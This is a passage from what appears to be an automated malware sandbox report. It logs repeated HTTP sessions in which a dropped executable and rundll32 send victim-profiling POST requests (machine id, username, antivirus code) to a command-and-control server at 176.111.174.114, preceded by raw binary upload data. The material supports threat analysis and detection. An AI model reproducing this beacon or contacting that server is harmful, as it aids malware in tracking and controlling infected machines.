|[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 23:00:03.068687916 CEST10456OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 23:00:03.068725109 CEST10458OUTData Raw: a9 4b 76 b5 94 15 3e 9b 28 c5 7b b6 d6 2f 67 d0 fa 03 51 bf fd 90 bf 6a ef 86 7f 0c b4 ff 00 1b fe d0 f6 df 08 ff 00 e1 56 58 ea 1e 1c bd d1 3c 49 a0 6a fa a4 fa 9f 87 df 58 bc d4 ed 27 d3 0d 8d b5 c4 4f 7c a9 7d 71 04 90 dd cb 69 11 78 a0 61 3e
                                                                                                                                          Data Ascii: Kv>({/gQjVX<IjX'O|}qixa>$|y=|K^>a?i={i6A&4e"$x;[u|Dz58AYRUwvvJ8.JJ2m]KO_Oe'tc
                                                                                                                                          Apr 28, 2021 23:00:03.069195986 CEST10461OUTData Raw: bf e5 4d aa 33 1d 27 6a 75 36 3e f4 49 da 80 1b 49 dd 69 68 dd b7 9c d4 cb 73 40 a9 2a 20 db b9 a7 c7 de 88 93 22 54 fb b4 b5 14 5f eb 2a 5a a3 39 08 ff 00 76 99 4f 7f bb 4c a0 71 d8 8e 9c 9d 68 e7 7d 23 fd ea 06 0c db a9 63 ef 44 9d a8 93 b5 00
                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 23:00:03.069279909 CEST10464OUTData Raw: 0b 99 11 d4 94 52 95 2b ce 68 17 30 c7 4f 32 a3 fb 37 b5 49 1f 7a 75 05 7b c5 67 89 e3 a4 1f ee 55 bd 85 87 4a 3c 95 a9 f6 61 ed 11 4d 87 cd 81 de 97 cb ff 00 a6 55 66 4b 5a 64 90 ed 14 bd 9b 2b da 15 f6 7f b3 fa 52 49 0e ee b5 3f 94 fe 94 61 fd
                                                                                                                                          Data Ascii: R+h0O27Izu{gUJ<aMUfKZd+RI?a:fW9U"zUKdA/jEgW1[bRy~ch^|0*iu>rI1')__O)|MRT)O,vnrNN5\ToHb*JCe
                                                                                                                                          Apr 28, 2021 23:00:03.069453001 CEST10466OUTData Raw: f9 f0 8f f6 66 fd bf f5 ff 00 84 ff 00 04 fc 24 ba 2e 81 a6 ad aa d9 d9 7d ae 5b 86 45 93 4c b0 b8 60 65 99 de 47 fd e4 f2 91 b9 8e 37 60 70 05 7e d2 7e c3 ff 00 b6 2f fc 2d 4f da 8b c3 1e 02 ff 00 87 c9 ff 00 c2 d6 fb 7f db 7f e2 81 ff 00 86 78
                                                                                                                                          Data Ascii: f$.}[EL`eG7`p~~/-Oxe<N:R4,*(.kTM}}nz(5yc((~$}:'ju=:~46zD8AQU*_
                                                                                                                                          Apr 28, 2021 23:00:03.070033073 CEST10469OUTData Raw: e2 a9 aa 7b ab 6e a5 7e 6e 6d 57 c4 a5 ef 5d f5 dc fe 6a 87 0d f8 93 1c d1 63 de 16 a3 a9 6b 3b db 58 db 97 97 47 f0 b8 fb b6 5d 0f 42 ff 00 82 6c fe d8 5e 29 f1 cf 8e 3e 15 fe c6 9f 16 16 69 7c 47 e0 0f 88 17 cf a5 5e 16 f3 37 e9 d0 f8 7b 5b 81
                                                                                                                                          Data Ascii: {n~nmW]jck;XG]Bl^)>i|G^7{[w$h4l$mG?VW'zC?XxS_"InuKnXKaqmELg:8O!-8Lq7JTeNg\C>Jy%8(AF
                                                                                                                                          Apr 28, 2021 23:00:03.070147991 CEST10472OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 23:00:03.070377111 CEST10475OUTData Raw: 71 ff 00 09 d7 8d cf fd c9 13 7f f1 75 fc de 78 6b e1 1f c5 8f 18 fc 4d 1f 05 3c 1f f0 ab c4 9a af 8c cd fc f6 23 c2 3a 66 85 71 3e a8 6e a1 df e7 41 f6 44 43 37 98 9b 1f 72 6d dc bb 1b 20 60 d7 5f a0 7e c4 3f b6 af 8c 3c 6b af 7c 33 f0 97 ec 75
                                                                                                                                          Data Ascii: quxkM<#:fq>nADC7rm `_~?<k|3u[T'~?:?j 2[F@/`1UZ-jCcq:n!}uz7r~o:3>6x?823_:[oAIzm"I4bCE
                                                                                                                                          Apr 28, 2021 23:00:03.070513010 CEST10477OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 23:00:03.070616961 CEST10480OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          329192.168.2.449947176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:03.071373940 CEST10480OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          33176.111.174.11480192.168.2.449764C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:15.059020996 CEST4537INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:15 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          330176.111.174.11480192.168.2.449947C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:03.168400049 CEST10481INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:03 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          331192.168.2.449948176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:03.382013083 CEST10668OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          332176.111.174.11480192.168.2.449946C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:03.474809885 CEST10669INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:03 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          333176.111.174.11480192.168.2.449948C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:03.484822989 CEST10669INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:03 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          334192.168.2.449950176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:03.692403078 CEST10670OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          335176.111.174.11480192.168.2.449950C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:03.792205095 CEST10671INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:03 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          336192.168.2.449951176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:04.020566940 CEST10671OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          337176.111.174.11480192.168.2.449951C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:04.121830940 CEST10672INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:04 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          338192.168.2.449952176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:04.329595089 CEST10672OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          339176.111.174.11480192.168.2.449952C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:04.429030895 CEST10673INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:04 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          34192.168.2.449765176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:15.731309891 CEST4538OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          340192.168.2.449953176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:04.647456884 CEST10673OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          341176.111.174.11480192.168.2.449953C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:04.751154900 CEST10674INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:04 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          342192.168.2.449955176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:04.958950996 CEST10674OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          343176.111.174.11480192.168.2.449955C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:05.060460091 CEST10675INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:05 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          344192.168.2.449956176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:05.272541046 CEST10675OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          345176.111.174.11480192.168.2.449956C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:05.376384974 CEST10676INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:05 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          346192.168.2.449957176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:05.582420111 CEST10676OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          347176.111.174.11480192.168.2.449957C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:05.683186054 CEST10677INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:05 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          348192.168.2.449958176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:05.910500050 CEST10677OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          349176.111.174.11480192.168.2.449958C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:06.014380932 CEST10678INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:05 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          35176.111.174.11480192.168.2.449765C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:15.833139896 CEST4538INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:15 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


